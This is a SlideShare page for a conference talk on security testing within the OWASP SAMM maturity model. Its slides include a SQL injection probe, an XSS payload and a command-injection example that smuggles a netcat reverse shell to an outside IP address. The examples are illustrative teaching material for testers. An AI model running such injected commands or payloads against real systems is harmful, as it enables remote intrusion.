SlideShare a Scribd company logo

ОЛЕКСІЙ БАРАНОВСЬКИЙ  "Роль та кейси тестування в моделі OWASP SAMM"  

Dakiry
Dakiry

ОЛЕКСІЙ БАРАНОВСЬКИЙ  "Роль та кейси тестування в моделі OWASP SAMM"  

Business
1 of 24
Testing cases in OWASP SAMM OLEKSII BARANOVSKYI
My vision  Security isn’t a miracle  There is no lack in “security testing” there is a lack of “testing security”  Traditional testing is more more formalized, manageable and difficult. WHY?
OWASP SAMM The Open Web Application Security Project Software Assurance Maturity Model
Postures  Evaluating an organization’s existing software security practices.  Building a balanced software security assurance program in well-defined iterations.  Demonstrating concrete improvements to a security assurance program.  Defining and measuring security-related activities throughout an organization.
Why we need to use it? Users: Software development company Enterprise
SAMM
Security testing place
Case 1. It’s not about security
SAMM
Case 2. SQLinj Example http://site.com/test/test.php?id=434
Case 2. SQLinj Example http://site.com/test/test.php?id=434’
SAMM
Case 3. SetUID Example import os cmd = './date.sh ' + param1 os.system(cmd)
Case 3. SetUID Example import os cmd = './date.sh ' + ’0.0.0; nc –e /bin/bash 5.10.114.4 8080' os.system(cmd) * Thanks to Yurii Bilyk
SAMM
Case 4. XSS Example <script>alert(‘ok’);</script> "'}})}}})});alert(ok'); window.addEventListener('load', function() { new Vue({ methods:{ filter:function(){$.ajax({data:{a:'"
SAMM and where should we start?
Security requirements by SAMM
Case 5. HTTPS example Requirement: Server and client should communicate via HTTP protocol. Requirement: Server and client should communicate via HTTPS protocol. Requirement: Server and client should communicate via HTTP with way that excludes the disclosure of critical information.
SAMM and where should we start?
Conclusions  Security really is not a miracle  Security testing is a part of global testing coverage  SAMM is a step from dedicated security testing to TMM and EAAF
Thanks a lot! Any additional questions?
Stay secure and mature! HTTPS://WWW.FACEBOOK.COM/OLEKSII.BARANOVSKYI HTTPS://WWW.LINKEDIN.COM/IN/OLEKSIIBARANOVSKYI/

Recommended

Owasp SAMM v1.5
Owasp SAMM v1.5Owasp SAMM v1.5
Owasp SAMM v1.5Brian Glas
 
OWASP Open SAMM
OWASP Open SAMMOWASP Open SAMM
OWASP Open SAMMintive
 
OWASP San Antonio: Open Software Assurance Maturity Model (OpenSAMM)
OWASP San Antonio: Open Software Assurance Maturity Model (OpenSAMM)OWASP San Antonio: Open Software Assurance Maturity Model (OpenSAMM)
OWASP San Antonio: Open Software Assurance Maturity Model (OpenSAMM)Denim Group
 
Rest assured vodqa
Rest assured vodqaRest assured vodqa
Rest assured vodqasriram subramanian
 
5 Ways to make load testing work for you
5 Ways to make load testing work for you5 Ways to make load testing work for you
5 Ways to make load testing work for youIsrael Rogoza
 
Pavlo Radchuk - OWASP SAMM: Understanding Agile in Security
Pavlo Radchuk - OWASP SAMM: Understanding Agile in SecurityPavlo Radchuk - OWASP SAMM: Understanding Agile in Security
Pavlo Radchuk - OWASP SAMM: Understanding Agile in SecurityOWASP Kyiv
 
Fundamentals of testing
Fundamentals of testingFundamentals of testing
Fundamentals of testingYusran5
 
How automation can help boost security
How automation can help boost securityHow automation can help boost security
How automation can help boost securityTestingXperts
 

Recommended

Owasp SAMM v1.5
Owasp SAMM v1.5Owasp SAMM v1.5
Owasp SAMM v1.5Brian Glas
 
OWASP Open SAMM
OWASP Open SAMMOWASP Open SAMM
OWASP Open SAMMintive
 
OWASP San Antonio: Open Software Assurance Maturity Model (OpenSAMM)
OWASP San Antonio: Open Software Assurance Maturity Model (OpenSAMM)OWASP San Antonio: Open Software Assurance Maturity Model (OpenSAMM)
OWASP San Antonio: Open Software Assurance Maturity Model (OpenSAMM)Denim Group
 
Rest assured vodqa
Rest assured vodqaRest assured vodqa
Rest assured vodqasriram subramanian
 
5 Ways to make load testing work for you
5 Ways to make load testing work for you5 Ways to make load testing work for you
5 Ways to make load testing work for youIsrael Rogoza
 
Pavlo Radchuk - OWASP SAMM: Understanding Agile in Security
Pavlo Radchuk - OWASP SAMM: Understanding Agile in SecurityPavlo Radchuk - OWASP SAMM: Understanding Agile in Security
Pavlo Radchuk - OWASP SAMM: Understanding Agile in SecurityOWASP Kyiv
 
Fundamentals of testing
Fundamentals of testingFundamentals of testing
Fundamentals of testingYusran5
 
How automation can help boost security
How automation can help boost securityHow automation can help boost security
How automation can help boost securityTestingXperts
 
The complete guide for negative testing | David Tzemach
The complete guide for negative testing | David TzemachThe complete guide for negative testing | David Tzemach
The complete guide for negative testing | David TzemachDavid Tzemach
 
Beyond Security Reviews Beyondsecurity.com
Beyond Security Reviews Beyondsecurity.comBeyond Security Reviews Beyondsecurity.com
Beyond Security Reviews Beyondsecurity.comBeyondSecurity.com Review
 
Best practices for test automation
Best practices for test automationBest practices for test automation
Best practices for test automationDavid Tzemach
 
Myths of Automation Testing
Myths of Automation TestingMyths of Automation Testing
Myths of Automation TestingAbhishek Saxena
 
Automation and Agile Development
Automation and Agile DevelopmentAutomation and Agile Development
Automation and Agile DevelopmentMphasis
 
Software Testing Principal
Software Testing PrincipalSoftware Testing Principal
Software Testing PrincipalManisha Kapase
 
Fundamental of testing (what is testing)
Fundamental of testing (what is testing)Fundamental of testing (what is testing)
Fundamental of testing (what is testing)helfa safitri
 
Fundamentals of testing
Fundamentals of testingFundamentals of testing
Fundamentals of testingANDRI HAIRIYADI, S.Kom.
 
Presentation13
Presentation13Presentation13
Presentation13Nikita Warma
 
Performance Testing – Look Before you Leap
Performance Testing – Look Before you LeapPerformance Testing – Look Before you Leap
Performance Testing – Look Before you LeapSoftware Testing Solution
 
Strategies to improve effectiveness of Test automation & ROI
Strategies to improve effectiveness of Test automation & ROIStrategies to improve effectiveness of Test automation & ROI
Strategies to improve effectiveness of Test automation & ROIBugRaptors
 
fundamentals of testing (Fundamental of testing what)
fundamentals of testing (Fundamental of testing what)fundamentals of testing (Fundamental of testing what)
fundamentals of testing (Fundamental of testing what)diana fitri, S.Kom
 
Fundamentals of testing
Fundamentals of testingFundamentals of testing
Fundamentals of testingMuhammad Khairil
 
User acceptance testing_(uat) 2013
User acceptance testing_(uat) 2013User acceptance testing_(uat) 2013
User acceptance testing_(uat) 2013Amrita Sinha
 
Fundamentals of testing 2
Fundamentals of testing 2Fundamentals of testing 2
Fundamentals of testing 2seli purnianda
 
Refactoring & Testing software.
Refactoring & Testing software.Refactoring & Testing software.
Refactoring & Testing software.Stephen O'Dwyer
 
Benefits of regression testing
Benefits of regression testingBenefits of regression testing
Benefits of regression testingMindfire LLC
 
BOHS control workshop slideshare version
BOHS control workshop slideshare versionBOHS control workshop slideshare version
BOHS control workshop slideshare versionMike Slater
 
Chapter10
Chapter10Chapter10
Chapter10Charles Alvin Vroman Jr
 
User Acceptance Testing (Uat)
User Acceptance Testing (Uat)User Acceptance Testing (Uat)
User Acceptance Testing (Uat)Thomas Martin
 
Software Testing Tutorial For Beginners | Manual & Automation Testing | Selen...
Software Testing Tutorial For Beginners | Manual & Automation Testing | Selen...Software Testing Tutorial For Beginners | Manual & Automation Testing | Selen...
Software Testing Tutorial For Beginners | Manual & Automation Testing | Selen...Edureka!
 
CHAPTER 15Security Quality Assurance TestingIn this chapter yo
CHAPTER 15Security Quality Assurance TestingIn this chapter yoCHAPTER 15Security Quality Assurance TestingIn this chapter yo
CHAPTER 15Security Quality Assurance TestingIn this chapter yoJinElias52
 

More Related Content

What's hot

The complete guide for negative testing | David Tzemach
The complete guide for negative testing | David TzemachThe complete guide for negative testing | David Tzemach
The complete guide for negative testing | David TzemachDavid Tzemach
 
Best practices for test automation
Best practices for test automationBest practices for test automation
Best practices for test automationDavid Tzemach
 
Myths of Automation Testing
Myths of Automation TestingMyths of Automation Testing
Myths of Automation TestingAbhishek Saxena
 
Automation and Agile Development
Automation and Agile DevelopmentAutomation and Agile Development
Automation and Agile DevelopmentMphasis
 
Software Testing Principal
Software Testing PrincipalSoftware Testing Principal
Software Testing PrincipalManisha Kapase
 
Fundamental of testing (what is testing)
Fundamental of testing (what is testing)Fundamental of testing (what is testing)
Fundamental of testing (what is testing)helfa safitri
 
Performance Testing – Look Before you Leap
Performance Testing – Look Before you LeapPerformance Testing – Look Before you Leap
Performance Testing – Look Before you LeapSoftware Testing Solution
 
Strategies to improve effectiveness of Test automation & ROI
Strategies to improve effectiveness of Test automation & ROIStrategies to improve effectiveness of Test automation & ROI
Strategies to improve effectiveness of Test automation & ROIBugRaptors
 
fundamentals of testing (Fundamental of testing what)
fundamentals of testing (Fundamental of testing what)fundamentals of testing (Fundamental of testing what)
fundamentals of testing (Fundamental of testing what)diana fitri, S.Kom
 
User acceptance testing_(uat) 2013
User acceptance testing_(uat) 2013User acceptance testing_(uat) 2013
User acceptance testing_(uat) 2013Amrita Sinha
 
Fundamentals of testing 2
Fundamentals of testing 2Fundamentals of testing 2
Fundamentals of testing 2seli purnianda
 
Refactoring & Testing software.
Refactoring & Testing software.Refactoring & Testing software.
Refactoring & Testing software.Stephen O'Dwyer
 
Benefits of regression testing
Benefits of regression testingBenefits of regression testing
Benefits of regression testingMindfire LLC
 
BOHS control workshop slideshare version
BOHS control workshop slideshare versionBOHS control workshop slideshare version
BOHS control workshop slideshare versionMike Slater
 
User Acceptance Testing (Uat)
User Acceptance Testing (Uat)User Acceptance Testing (Uat)
User Acceptance Testing (Uat)Thomas Martin
 

What's hot (20)

The complete guide for negative testing | David Tzemach
The complete guide for negative testing | David TzemachThe complete guide for negative testing | David Tzemach
The complete guide for negative testing | David Tzemach
 
Beyond Security Reviews Beyondsecurity.com
Beyond Security Reviews Beyondsecurity.comBeyond Security Reviews Beyondsecurity.com
Beyond Security Reviews Beyondsecurity.com
 
Best practices for test automation
Best practices for test automationBest practices for test automation
Best practices for test automation
 
Myths of Automation Testing
Myths of Automation TestingMyths of Automation Testing
Myths of Automation Testing
 
Automation and Agile Development
Automation and Agile DevelopmentAutomation and Agile Development
Automation and Agile Development
 
Software Testing Principal
Software Testing PrincipalSoftware Testing Principal
Software Testing Principal
 
Fundamental of testing (what is testing)
Fundamental of testing (what is testing)Fundamental of testing (what is testing)
Fundamental of testing (what is testing)
 
Fundamentals of testing
Fundamentals of testingFundamentals of testing
Fundamentals of testing
 
Presentation13
Presentation13Presentation13
Presentation13
 
Performance Testing – Look Before you Leap
Performance Testing – Look Before you LeapPerformance Testing – Look Before you Leap
Performance Testing – Look Before you Leap
 
Strategies to improve effectiveness of Test automation & ROI
Strategies to improve effectiveness of Test automation & ROIStrategies to improve effectiveness of Test automation & ROI
Strategies to improve effectiveness of Test automation & ROI
 
fundamentals of testing (Fundamental of testing what)
fundamentals of testing (Fundamental of testing what)fundamentals of testing (Fundamental of testing what)
fundamentals of testing (Fundamental of testing what)
 
Fundamentals of testing
Fundamentals of testingFundamentals of testing
Fundamentals of testing
 
User acceptance testing_(uat) 2013
User acceptance testing_(uat) 2013User acceptance testing_(uat) 2013
User acceptance testing_(uat) 2013
 
Fundamentals of testing 2
Fundamentals of testing 2Fundamentals of testing 2
Fundamentals of testing 2
 
Refactoring & Testing software.
Refactoring & Testing software.Refactoring & Testing software.
Refactoring & Testing software.
 
Benefits of regression testing
Benefits of regression testingBenefits of regression testing
Benefits of regression testing
 
BOHS control workshop slideshare version
BOHS control workshop slideshare versionBOHS control workshop slideshare version
BOHS control workshop slideshare version
 
Chapter10
Chapter10Chapter10
Chapter10
 
User Acceptance Testing (Uat)
User Acceptance Testing (Uat)User Acceptance Testing (Uat)
User Acceptance Testing (Uat)
 

Similar to ОЛЕКСІЙ БАРАНОВСЬКИЙ  "Роль та кейси тестування в моделі OWASP SAMM"  

Software Testing Tutorial For Beginners | Manual & Automation Testing | Selen...
Software Testing Tutorial For Beginners | Manual & Automation Testing | Selen...Software Testing Tutorial For Beginners | Manual & Automation Testing | Selen...
Software Testing Tutorial For Beginners | Manual & Automation Testing | Selen...Edureka!
 
CHAPTER 15Security Quality Assurance TestingIn this chapter yo
CHAPTER 15Security Quality Assurance TestingIn this chapter yoCHAPTER 15Security Quality Assurance TestingIn this chapter yo
CHAPTER 15Security Quality Assurance TestingIn this chapter yoJinElias52
 
Challenges in Security Testing
Challenges in Security TestingChallenges in Security Testing
Challenges in Security TestingShikha Jarial
 
want to contact me login to www.stqa.org
want to contact me login to www.stqa.orgwant to contact me login to www.stqa.org
want to contact me login to www.stqa.orgnazeer pasha
 
Test Cases Vs Test Scenarios
Test Cases Vs Test ScenariosTest Cases Vs Test Scenarios
Test Cases Vs Test ScenariosSneha Singh
 
Fundamental Of Testing
Fundamental Of TestingFundamental Of Testing
Fundamental Of Testingsuci maisaroh
 
Secure Software Development Models and Methods integrated with CMMI.ppt
Secure Software Development Models and Methods integrated with CMMI.pptSecure Software Development Models and Methods integrated with CMMI.ppt
Secure Software Development Models and Methods integrated with CMMI.pptNeha Sharma
 
10 Steps To Secure Agile Development
10 Steps To Secure Agile Development10 Steps To Secure Agile Development
10 Steps To Secure Agile DevelopmentCheckmarx
 
Bridging the gap - Security and Software Testing
Bridging the gap - Security and Software TestingBridging the gap - Security and Software Testing
Bridging the gap - Security and Software TestingRoberto Suggi Liverani
 
Testing frameworks
Testing frameworksTesting frameworks
Testing frameworksSakthi K
 
Test Automation Frameworks Using Selenium | Edureka
Test Automation Frameworks Using Selenium | EdurekaTest Automation Frameworks Using Selenium | Edureka
Test Automation Frameworks Using Selenium | EdurekaEdureka!
 
Enabling CD in Enterprises with Testing
Enabling CD in Enterprises with TestingEnabling CD in Enterprises with Testing
Enabling CD in Enterprises with TestingAnand Bagmar
 
Security Services and Approach by Nazar Tymoshyk
Security Services and Approach by Nazar TymoshykSecurity Services and Approach by Nazar Tymoshyk
Security Services and Approach by Nazar TymoshykSoftServe
 
OWASP: Building Secure Web Apps
OWASP: Building Secure Web AppsOWASP: Building Secure Web Apps
OWASP: Building Secure Web Appsmlogvinov
 
Application Security 101 (OWASP DC)
Application Security 101 (OWASP DC)Application Security 101 (OWASP DC)
Application Security 101 (OWASP DC)mikemcbryde
 
5 Essential Tips for Load Testing Beginners
5 Essential Tips for Load Testing Beginners5 Essential Tips for Load Testing Beginners
5 Essential Tips for Load Testing BeginnersNeotys
 

Similar to ОЛЕКСІЙ БАРАНОВСЬКИЙ  "Роль та кейси тестування в моделі OWASP SAMM"   (20)

Software Testing Tutorial For Beginners | Manual & Automation Testing | Selen...
Software Testing Tutorial For Beginners | Manual & Automation Testing | Selen...Software Testing Tutorial For Beginners | Manual & Automation Testing | Selen...
Software Testing Tutorial For Beginners | Manual & Automation Testing | Selen...
 
CHAPTER 15Security Quality Assurance TestingIn this chapter yo
CHAPTER 15Security Quality Assurance TestingIn this chapter yoCHAPTER 15Security Quality Assurance TestingIn this chapter yo
CHAPTER 15Security Quality Assurance TestingIn this chapter yo
 
Ch24
Ch24Ch24
Ch24
 
Challenges in Security Testing
Challenges in Security TestingChallenges in Security Testing
Challenges in Security Testing
 
want to contact me login to www.stqa.org
want to contact me login to www.stqa.orgwant to contact me login to www.stqa.org
want to contact me login to www.stqa.org
 
Test Cases Vs Test Scenarios
Test Cases Vs Test ScenariosTest Cases Vs Test Scenarios
Test Cases Vs Test Scenarios
 
Fundamental Of Testing
Fundamental Of TestingFundamental Of Testing
Fundamental Of Testing
 
Secure Software Development Models and Methods integrated with CMMI.ppt
Secure Software Development Models and Methods integrated with CMMI.pptSecure Software Development Models and Methods integrated with CMMI.ppt
Secure Software Development Models and Methods integrated with CMMI.ppt
 
10 Steps To Secure Agile Development
10 Steps To Secure Agile Development10 Steps To Secure Agile Development
10 Steps To Secure Agile Development
 
Bridging the gap - Security and Software Testing
Bridging the gap - Security and Software TestingBridging the gap - Security and Software Testing
Bridging the gap - Security and Software Testing
 
Testing frameworks
Testing frameworksTesting frameworks
Testing frameworks
 
Test Automation Frameworks Using Selenium | Edureka
Test Automation Frameworks Using Selenium | EdurekaTest Automation Frameworks Using Selenium | Edureka
Test Automation Frameworks Using Selenium | Edureka
 
Agile and Secure Development
Agile and Secure DevelopmentAgile and Secure Development
Agile and Secure Development
 
Se project-methodology-for-security-project-web
Se project-methodology-for-security-project-webSe project-methodology-for-security-project-web
Se project-methodology-for-security-project-web
 
Enabling CD in Enterprises with Testing
Enabling CD in Enterprises with TestingEnabling CD in Enterprises with Testing
Enabling CD in Enterprises with Testing
 
Service pemanas air solahart hp 081313462267
Service pemanas air solahart hp 081313462267Service pemanas air solahart hp 081313462267
Service pemanas air solahart hp 081313462267
 
Security Services and Approach by Nazar Tymoshyk
Security Services and Approach by Nazar TymoshykSecurity Services and Approach by Nazar Tymoshyk
Security Services and Approach by Nazar Tymoshyk
 
OWASP: Building Secure Web Apps
OWASP: Building Secure Web AppsOWASP: Building Secure Web Apps
OWASP: Building Secure Web Apps
 
Application Security 101 (OWASP DC)
Application Security 101 (OWASP DC)Application Security 101 (OWASP DC)
Application Security 101 (OWASP DC)
 
5 Essential Tips for Load Testing Beginners
5 Essential Tips for Load Testing Beginners5 Essential Tips for Load Testing Beginners
5 Essential Tips for Load Testing Beginners
 

More from Dakiry

НАРЦИСИЗМ ЯК ПАСИВНЕ КУРІННЯ
НАРЦИСИЗМ ЯК ПАСИВНЕ КУРІННЯНАРЦИСИЗМ ЯК ПАСИВНЕ КУРІННЯ
НАРЦИСИЗМ ЯК ПАСИВНЕ КУРІННЯDakiry
 
МАНІПУЛЯЦІЇ: ХТО КОГО І ДЛЯ ЧОГО? - Інна Тіторенко
МАНІПУЛЯЦІЇ: ХТО КОГО І ДЛЯ ЧОГО? - Інна ТіторенкоМАНІПУЛЯЦІЇ: ХТО КОГО І ДЛЯ ЧОГО? - Інна Тіторенко
МАНІПУЛЯЦІЇ: ХТО КОГО І ДЛЯ ЧОГО? - Інна ТіторенкоDakiry
 
How to run a discovery workshop
How to run a discovery workshopHow to run a discovery workshop
How to run a discovery workshopDakiry
 
З понеділка йду на новий проект. The tester’s version - Олександра Зубаль
З понеділка йду на новий проект. The tester’s version - Олександра ЗубальЗ понеділка йду на новий проект. The tester’s version - Олександра Зубаль
З понеділка йду на новий проект. The tester’s version - Олександра ЗубальDakiry
 
Робота з текстом: від чернетки до опублікування
Робота з текстом: від чернетки до опублікуванняРобота з текстом: від чернетки до опублікування
Робота з текстом: від чернетки до опублікуванняDakiry
 
Контентна стратегія в ІТ: від статті до першого ліда
Контентна стратегія в ІТ: від статті до першого лідаКонтентна стратегія в ІТ: від статті до першого ліда
Контентна стратегія в ІТ: від статті до першого лідаDakiry
 
Oleh Shpyrna "Security Testing Basics: Check your Webapp for gaps before l_unch"
Oleh Shpyrna "Security Testing Basics: Check your Webapp for gaps before l_unch"Oleh Shpyrna "Security Testing Basics: Check your Webapp for gaps before l_unch"
Oleh Shpyrna "Security Testing Basics: Check your Webapp for gaps before l_unch"Dakiry
 
Stepan Shykerynets "Power of QA (A Journey: From Hell to Heaven. Story of gr...
Stepan Shykerynets "Power of QA (A Journey: From Hell to Heaven. Story of gr...Stepan Shykerynets "Power of QA (A Journey: From Hell to Heaven. Story of gr...
Stepan Shykerynets "Power of QA (A Journey: From Hell to Heaven. Story of gr...Dakiry
 
Микола Солопій "Selenium рулить, однак..."
Микола Солопій "Selenium рулить, однак..."Микола Солопій "Selenium рулить, однак..."
Микола Солопій "Selenium рулить, однак..."Dakiry
 
Oleksandra Zubal "Project starters: test automation view"
Oleksandra Zubal "Project starters: test automation view"Oleksandra Zubal "Project starters: test automation view"
Oleksandra Zubal "Project starters: test automation view"Dakiry
 
Vladyslav Romanchenko "How to keep high code quality without e2e tests"
Vladyslav Romanchenko "How to keep high code quality without e2e tests"Vladyslav Romanchenko "How to keep high code quality without e2e tests"
Vladyslav Romanchenko "How to keep high code quality without e2e tests"Dakiry
 
Діана Пінчук "Як відрізнити авторизацію від аутентифікації та перестати бояти...
Діана Пінчук "Як відрізнити авторизацію від аутентифікації та перестати бояти...Діана Пінчук "Як відрізнити авторизацію від аутентифікації та перестати бояти...
Діана Пінчук "Як відрізнити авторизацію від аутентифікації та перестати бояти...Dakiry
 
Yuriy Malyi "E2E testing organization in multi-system projects"
Yuriy Malyi "E2E testing organization in multi-system projects"Yuriy Malyi "E2E testing organization in multi-system projects"
Yuriy Malyi "E2E testing organization in multi-system projects"Dakiry
 
Petro Tarasenko "You've become a TL. What's next?"
Petro Tarasenko "You've become a TL. What's next?" Petro Tarasenko "You've become a TL. What's next?"
Petro Tarasenko "You've become a TL. What's next?"Dakiry
 
Roman Yakymchuk "Дослідницьке тестування. Перезапуск"
Roman Yakymchuk "Дослідницьке тестування. Перезапуск"Roman Yakymchuk "Дослідницьке тестування. Перезапуск"
Roman Yakymchuk "Дослідницьке тестування. Перезапуск"Dakiry
 
Maryna Shulga "Mission Impossible. Впровадити тест процеси, якщо ніхто цього ...
Maryna Shulga "Mission Impossible. Впровадити тест процеси, якщо ніхто цього ...Maryna Shulga "Mission Impossible. Впровадити тест процеси, якщо ніхто цього ...
Maryna Shulga "Mission Impossible. Впровадити тест процеси, якщо ніхто цього ...Dakiry
 
Олексій Брошков "Мистецтво Дослідницького Тестування"
Олексій Брошков "Мистецтво Дослідницького Тестування"Олексій Брошков "Мистецтво Дослідницького Тестування"
Олексій Брошков "Мистецтво Дослідницького Тестування"Dakiry
 
Альона Тудан " Життя QA в ажурі"
Альона Тудан " Життя QA в ажурі"Альона Тудан " Життя QA в ажурі"
Альона Тудан " Життя QA в ажурі"Dakiry
 
Андрій Степура "Тренди в публічних виступах"
Андрій Степура "Тренди в публічних виступах"Андрій Степура "Тренди в публічних виступах"
Андрій Степура "Тренди в публічних виступах"Dakiry
 
Зоряна Борбулевич "Підхід, який трансформував компанію Microsoft: ННК і його...
Зоряна Борбулевич "Підхід, який трансформував компанію Microsoft: ННК і його...Зоряна Борбулевич "Підхід, який трансформував компанію Microsoft: ННК і його...
Зоряна Борбулевич "Підхід, який трансформував компанію Microsoft: ННК і його...Dakiry
 

More from Dakiry (20)

НАРЦИСИЗМ ЯК ПАСИВНЕ КУРІННЯ
НАРЦИСИЗМ ЯК ПАСИВНЕ КУРІННЯНАРЦИСИЗМ ЯК ПАСИВНЕ КУРІННЯ
НАРЦИСИЗМ ЯК ПАСИВНЕ КУРІННЯ
 
МАНІПУЛЯЦІЇ: ХТО КОГО І ДЛЯ ЧОГО? - Інна Тіторенко
МАНІПУЛЯЦІЇ: ХТО КОГО І ДЛЯ ЧОГО? - Інна ТіторенкоМАНІПУЛЯЦІЇ: ХТО КОГО І ДЛЯ ЧОГО? - Інна Тіторенко
МАНІПУЛЯЦІЇ: ХТО КОГО І ДЛЯ ЧОГО? - Інна Тіторенко
 
How to run a discovery workshop
How to run a discovery workshopHow to run a discovery workshop
How to run a discovery workshop
 
З понеділка йду на новий проект. The tester’s version - Олександра Зубаль
З понеділка йду на новий проект. The tester’s version - Олександра ЗубальЗ понеділка йду на новий проект. The tester’s version - Олександра Зубаль
З понеділка йду на новий проект. The tester’s version - Олександра Зубаль
 
Робота з текстом: від чернетки до опублікування
Робота з текстом: від чернетки до опублікуванняРобота з текстом: від чернетки до опублікування
Робота з текстом: від чернетки до опублікування
 
Контентна стратегія в ІТ: від статті до першого ліда
Контентна стратегія в ІТ: від статті до першого лідаКонтентна стратегія в ІТ: від статті до першого ліда
Контентна стратегія в ІТ: від статті до першого ліда
 
Oleh Shpyrna "Security Testing Basics: Check your Webapp for gaps before l_unch"
Oleh Shpyrna "Security Testing Basics: Check your Webapp for gaps before l_unch"Oleh Shpyrna "Security Testing Basics: Check your Webapp for gaps before l_unch"
Oleh Shpyrna "Security Testing Basics: Check your Webapp for gaps before l_unch"
 
Stepan Shykerynets "Power of QA (A Journey: From Hell to Heaven. Story of gr...
Stepan Shykerynets "Power of QA (A Journey: From Hell to Heaven. Story of gr...Stepan Shykerynets "Power of QA (A Journey: From Hell to Heaven. Story of gr...
Stepan Shykerynets "Power of QA (A Journey: From Hell to Heaven. Story of gr...
 
Микола Солопій "Selenium рулить, однак..."
Микола Солопій "Selenium рулить, однак..."Микола Солопій "Selenium рулить, однак..."
Микола Солопій "Selenium рулить, однак..."
 
Oleksandra Zubal "Project starters: test automation view"
Oleksandra Zubal "Project starters: test automation view"Oleksandra Zubal "Project starters: test automation view"
Oleksandra Zubal "Project starters: test automation view"
 
Vladyslav Romanchenko "How to keep high code quality without e2e tests"
Vladyslav Romanchenko "How to keep high code quality without e2e tests"Vladyslav Romanchenko "How to keep high code quality without e2e tests"
Vladyslav Romanchenko "How to keep high code quality without e2e tests"
 
Діана Пінчук "Як відрізнити авторизацію від аутентифікації та перестати бояти...
Діана Пінчук "Як відрізнити авторизацію від аутентифікації та перестати бояти...Діана Пінчук "Як відрізнити авторизацію від аутентифікації та перестати бояти...
Діана Пінчук "Як відрізнити авторизацію від аутентифікації та перестати бояти...
 
Yuriy Malyi "E2E testing organization in multi-system projects"
Yuriy Malyi "E2E testing organization in multi-system projects"Yuriy Malyi "E2E testing organization in multi-system projects"
Yuriy Malyi "E2E testing organization in multi-system projects"
 
Petro Tarasenko "You've become a TL. What's next?"
Petro Tarasenko "You've become a TL. What's next?" Petro Tarasenko "You've become a TL. What's next?"
Petro Tarasenko "You've become a TL. What's next?"
 
Roman Yakymchuk "Дослідницьке тестування. Перезапуск"
Roman Yakymchuk "Дослідницьке тестування. Перезапуск"Roman Yakymchuk "Дослідницьке тестування. Перезапуск"
Roman Yakymchuk "Дослідницьке тестування. Перезапуск"
 
Maryna Shulga "Mission Impossible. Впровадити тест процеси, якщо ніхто цього ...
Maryna Shulga "Mission Impossible. Впровадити тест процеси, якщо ніхто цього ...Maryna Shulga "Mission Impossible. Впровадити тест процеси, якщо ніхто цього ...
Maryna Shulga "Mission Impossible. Впровадити тест процеси, якщо ніхто цього ...
 
Олексій Брошков "Мистецтво Дослідницького Тестування"
Олексій Брошков "Мистецтво Дослідницького Тестування"Олексій Брошков "Мистецтво Дослідницького Тестування"
Олексій Брошков "Мистецтво Дослідницького Тестування"
 
Альона Тудан " Життя QA в ажурі"
Альона Тудан " Життя QA в ажурі"Альона Тудан " Життя QA в ажурі"
Альона Тудан " Життя QA в ажурі"
 
Андрій Степура "Тренди в публічних виступах"
Андрій Степура "Тренди в публічних виступах"Андрій Степура "Тренди в публічних виступах"
Андрій Степура "Тренди в публічних виступах"
 
Зоряна Борбулевич "Підхід, який трансформував компанію Microsoft: ННК і його...
Зоряна Борбулевич "Підхід, який трансформував компанію Microsoft: ННК і його...Зоряна Борбулевич "Підхід, який трансформував компанію Microsoft: ННК і його...
Зоряна Борбулевич "Підхід, який трансформував компанію Microsoft: ННК і його...
 

Recently uploaded

Insurers' journeys to build a mastery in the IoT usage
Insurers' journeys to build a mastery in the IoT usageInsurers' journeys to build a mastery in the IoT usage
Insurers' journeys to build a mastery in the IoT usageMatteo Carbone
 
Best Basmati Rice Manufacturers in India
Best Basmati Rice Manufacturers in IndiaBest Basmati Rice Manufacturers in India
Best Basmati Rice Manufacturers in IndiaShree Krishna Exports
 
Pharma Works Profile of Karan Communications
Pharma Works Profile of Karan CommunicationsPharma Works Profile of Karan Communications
Pharma Works Profile of Karan Communicationskarancommunications
 
Cash Payment 9602870969 Escort Service in Udaipur Call Girls
Cash Payment 9602870969 Escort Service in Udaipur Call GirlsCash Payment 9602870969 Escort Service in Udaipur Call Girls
Cash Payment 9602870969 Escort Service in Udaipur Call GirlsApsara Of India
 
Call Girls In DLf Gurgaon ➥99902@11544 ( Best price)100% Genuine Escort In 24...
Call Girls In DLf Gurgaon ➥99902@11544 ( Best price)100% Genuine Escort In 24...Call Girls In DLf Gurgaon ➥99902@11544 ( Best price)100% Genuine Escort In 24...
Call Girls In DLf Gurgaon ➥99902@11544 ( Best price)100% Genuine Escort In 24...lizamodels9
 
0183760ssssssssssssssssssssssssssss00101011 (27).pdf
0183760ssssssssssssssssssssssssssss00101011 (27).pdf0183760ssssssssssssssssssssssssssss00101011 (27).pdf
0183760ssssssssssssssssssssssssssss00101011 (27).pdfRenandantas16
 
Creating Low-Code Loan Applications using the Trisotech Mortgage Feature Set
Creating Low-Code Loan Applications using the Trisotech Mortgage Feature SetCreating Low-Code Loan Applications using the Trisotech Mortgage Feature Set
Creating Low-Code Loan Applications using the Trisotech Mortgage Feature SetDenis Gagné
 
Keppel Ltd. 1Q 2024 Business Update Presentation Slides
Keppel Ltd. 1Q 2024 Business Update Presentation SlidesKeppel Ltd. 1Q 2024 Business Update Presentation Slides
Keppel Ltd. 1Q 2024 Business Update Presentation SlidesKeppelCorporation
 
Call Girls in Gomti Nagar - 7388211116 - With room Service
Call Girls in Gomti Nagar - 7388211116 - With room ServiceCall Girls in Gomti Nagar - 7388211116 - With room Service
Call Girls in Gomti Nagar - 7388211116 - With room Servicediscovermytutordmt
 
Unlocking the Secrets of Affiliate Marketing.pdf
Unlocking the Secrets of Affiliate Marketing.pdfUnlocking the Secrets of Affiliate Marketing.pdf
Unlocking the Secrets of Affiliate Marketing.pdfOnline Income Engine
 
It will be International Nurses' Day on 12 May
It will be International Nurses' Day on 12 MayIt will be International Nurses' Day on 12 May
It will be International Nurses' Day on 12 MayNZSG
 
Ensure the security of your HCL environment by applying the Zero Trust princi...
Ensure the security of your HCL environment by applying the Zero Trust princi...Ensure the security of your HCL environment by applying the Zero Trust princi...
Ensure the security of your HCL environment by applying the Zero Trust princi...Roland Driesen
 
Mondelez State of Snacking and Future Trends 2023
Mondelez State of Snacking and Future Trends 2023Mondelez State of Snacking and Future Trends 2023
Mondelez State of Snacking and Future Trends 2023Neil Kimberley
 
7.pdf This presentation captures many uses and the significance of the number...
7.pdf This presentation captures many uses and the significance of the number...7.pdf This presentation captures many uses and the significance of the number...
7.pdf This presentation captures many uses and the significance of the number...Paul Menig
 
Regression analysis: Simple Linear Regression Multiple Linear Regression
Regression analysis: Simple Linear Regression Multiple Linear RegressionRegression analysis: Simple Linear Regression Multiple Linear Regression
